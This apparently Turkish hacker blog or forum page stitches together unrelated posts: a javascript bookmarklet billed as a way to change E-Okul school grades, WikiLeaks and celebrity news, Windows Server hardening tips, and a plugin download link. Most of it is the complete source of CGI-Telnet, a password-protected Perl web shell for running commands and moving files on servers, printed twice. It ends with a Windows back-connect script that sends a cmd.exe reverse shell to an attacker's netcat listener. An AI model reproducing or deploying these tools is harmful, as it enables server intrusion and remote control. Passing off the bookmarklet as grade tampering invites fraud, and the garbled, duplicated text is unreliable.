Neyse ben şu kodu vereyim isteyenlere bi teşekkür yeter yeni konu açmama gerek yok bu başlık altından anlatıcam herşeyi.
Gereken kod:
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
E-Okul Not Değiştirme
Neyse ben şu kodu vereyim isteyenlere bi teşekkür yeter yeni konu açmama gerek yok bu başlık altından anlatıcam herşeyi.
Gereken kod:
javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0
WikiLekas Nedir ?
Yönetimi ve tarihçesi
Wikileaks editör şefi Julian Assange
WikiLeaks'in Çinli muhaliflerin yanı sıra ABD, Tayvan, Avrupa, Avustralya ve Güney Afrikalı gazeteciler, matematikçiler ve şirket teknologları tarafından kurulduğu belirtilmiştir.[kaynak belirtilmeli] Avustralyalı gazeteci ve internet aktivisti Julian Assange, organizasyonun görünen yüzüdür.
Site 4 Ekim 2006 tarihinde yayına girmiş olup, kayıtlı olduğu ülke ABD'dir.[4] Sitenin ziyaret edilme oranının en yüksek olduğu ülke 29 Kasım 2010 itibarı ile İsveç'tir. İsveç'i İtalya ve Hollanda izlemektedir.[3]
Sızıntılar
Kuruluşundan bir yıl sonra, organizasyonun ve wikileaks.org 'un veritabanında 1.2 milyondan fazla doküman bulunmaktadır. "İpotek Cinayeti" videosu en kayda değer belgelerin başında gelir.[kaynak belirtilmeli] WikiLeaks yayınladığı raporlarla çok sayıda yeni medya ödülü kazanmıştır.[kaynak belirtilmeli]
WikiLeaks 26 Temmuz 2010'da Amerikan ordusunun 2004-2009 yılları arasında Afganistan Savaşı'nda tutmuş olduğu 92.000 belgeyi [5] The Guardian, The New York Times ve Der Spiegel gazeteleriyle birlikte açıklamıştır. Bireysel olayları da kapsayan günlükler, sivil kayıplar hakkında ayrıntılı bilgiler içermektedir. Belgeleri sızdıran er Bradley Manning görev yaptığı Kuveyt'teki Camp Arfijan üssünde tutuklanmıştır.[6]
ABD diplomatik belge sızıntısı
Ana madde: Amerika Birleşik Devletleri diplomatik belge sızıntısı
WikiLeaks'in 29 Kasım 2010'da yayınladığı diplomatik belgeler dünya çapında ses getirmiştir. Yayımlanacağı söylenen 251.287 belgenin yaklaşık 2000 tanesi yayımlamıştır.
Adanalı Dizisi Yeniden Start TV Ekranlarında
adanalı yeniden başlasın , adanalı yeniden başlayacak mı , adanalı yeniden başlıyor , adanalı yeniden başlar mı , adanalı yeniden başlasın , adanalı yeniden başlayacak mı , adanalı yeniden başlıyor , adanalı yeniden başlar mı ,adanalı yeniden başlasın , adanalı yeniden başlayacak mı , adanalı yeniden başlıyor , adanalı yeniden başlar mı
Seditio Mirror Kayıt Eklentisi
http://turkstarz.in/archive/mirror.rar
RedGuard Tarafından Yazılan Seditio Mirro Eklentisi..
Eklenti Tamamen Eğitim Amaçlıdır ..
10 Adımda Windows Server 2003 Güvenliği
# İşletim Sistemini kurarken windows dışında bir yol belirtin
# Dosya sistemi olarak herzaman NTFS kullanın
# Sadece ihtiyacınız olan Windows bileşenlerini yükleyin
# Sisteminizi izole edin
# En son Service Pack i yükleyin
# Servisler için domain hesapları yerine lokal hesaplar kullanın
# Administrator hesabının ismini değiştirin
# Yeni bir güvenlik güncellemesi çıktığında vakit kaybetmeden ilgili güncellemeyi uygulayın
# Group Policy kullanarak sisteminizin güvenliğini arttırın
# Windows Server 2003 Security Guide okuyun :)
Devamını Oku
# Dosya sistemi olarak herzaman NTFS kullanın
# Sadece ihtiyacınız olan Windows bileşenlerini yükleyin
# Sisteminizi izole edin
# En son Service Pack i yükleyin
# Servisler için domain hesapları yerine lokal hesaplar kullanın
# Administrator hesabının ismini değiştirin
# Yeni bir güvenlik güncellemesi çıktığında vakit kaybetmeden ilgili güncellemeyi uygulayın
# Group Policy kullanarak sisteminizin güvenliğini arttırın
# Windows Server 2003 Security Guide okuyun :)
Türkücü ‘Kıvırcık Ali’ trafik kazasında hayatını kaybetti
kıvırcık ali
’Kıvırcık Ali’ olarak bilinen Türk Halk Müziği sanatçısı Ali Özütemiz’in (42) Çatalca’da geçirdiğitrafik kazasısonucu hayatını kaybettiği öğrenildi.
Sabah 05.30 sıralarında Çatalca Tepecik mevkiinde meydana gelen kazada Ali Özütemiz’in otomobilinin takla attığı ifade edildi. Beşiktaş’taki stüdyosunda albüm çalışması yapan sanatçının sabaha karşı evine giderken kaza geçirdiği bildirildi. 42 yaşındaki Özütemiz’in hayatını kaybettiği, cesedinin isehastanemorguna kaldırıldığı öğrenildi.
WordPress Memory_Limit Sorunu [ Çözümü ]
son zamanlarda yaşanan kurulum esnasında yada güncelleme esnasında oluşan memory_limit hatasının çözümünden bahsedicem.
hata : Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 317860 bytes)
veya buna benzer olabilir.Tek yapmanız gereken hostcunuzla irtibata geçip 32M olan memory_limit inizi 128M ye çıkarmaktır sorun çözülücektir.Kolay gelsin.
Kaynak : http://www.cr4.org/wordpress-memory_limit-sorunu-cozumu.html
Devamını Oku
hata : Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 317860 bytes)
veya buna benzer olabilir.Tek yapmanız gereken hostcunuzla irtibata geçip 32M olan memory_limit inizi 128M ye çıkarmaktır sorun çözülücektir.Kolay gelsin.
Kaynak : http://www.cr4.org/wordpress-memory_limit-sorunu-cozumu.html
Kutsal Damacana 3 Drakula Full Online İndir İzle
http://t1.gstatic.com/images?q=tbn:ANd9GcQZwr5L0m3_IGG0CP1p-OYHvu-9QO78l_d4Nla_lk_lSPKplVYClQ&t=1
Devamını Oku
CGI Telnet Açık Kaynak Kodları
#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: mailto:UNITX_TEAM@HOTMAIL.COM
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "heart"; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <
Unit-X Team
$HtmlMetaHeader
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$
#'
print <
Trying $ServerName...
Connected to $ServerName
Escape character is ^]
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "
}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: mailto:UNITX_TEAM@HOTMAIL.COM
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "heart"; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <
$HtmlMetaHeader
# |
CGI-Telnet Unit-x Team Connected to $ServerName |
Upload File | Download File | Disconnect | Help |
|
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$
_____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 2.0
______ © 2009, Unit-X Master Heart
.-" "-.
/ UNIT-X \
| Master |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|*EVIL*|__/_______________________
(_)@8@8{}<________|-\Heart/-|________________________>
)_/ \ /
(@ `--------`
W A R N I N G: Tassaklı Serverlar İtina İle Gecilir$;#'
print <
Trying $ServerName...
Connected to $ServerName
Escape character is ^]
$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <
login: admin
password:
Yanlis Parola Gavat :D
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "
Connection closed by foreign host.
";}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <
Command exceeded maximum time of $CommandTimeoutDuration second(s).
Killed it!
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "$Prompt $RunCommand";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "$Prompt $RunCommand";<br />
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;<br />
if(!$WinNT)<br />
{<br />
$SIG{'ALRM'} = \&CommandTimeout;<br />
alarm($CommandTimeoutDuration);<br />
}<br />
if($ShowDynamicOutput) # show output as it is generated<br />
{<br />
$|=1;<br />
$Command .= " |";<br />
open(CommandOutput, $Command);<br />
while(<CommandOutput>)<br />
{<br />
$_ =~ s/(\n|\r\n)$//;<br />
print "$_\n";<br />
}<br />
$|=0;<br />
}<br />
else # show output after command completes<br />
{<br />
print `$Command`;<br />
}<br />
if(!$WinNT)<br />
{<br />
alarm(0);<br />
}<br />
print " ";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "";
&PrintPageHeader("c");
print <
Sending File $TransferFile...
If the download does not start automatically,
Click Here.
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "Failed to download $FileUrl: $!";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while();
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "Failed to download $SendFile: $!";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");
# start the uploading process
print "Uploading $TransferFile to $CurrentDir...
";
# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.
";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.
";
print "File Path: $TargetName
";
}
else
{
print "Failed: $!
";
}
}
print "";
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default
# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}
Devamını Oku
Windows Backconnect PERL
#!/usr/bin/perl
use IO::Socket;
# Windows back connect
# Use: bc.pl [Host] [Port]
# nc.exe -l -n -v -p 80
# Happy xek ;)
# Coded by Ctacok.
$ARGV=@ARGV;
if ($ARGV<2){
print "Moron?";
}
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Can't Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Can't Connect Host\n";
print "All ok... Connect to $ARGV[0] \n";
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("cmd.exe");
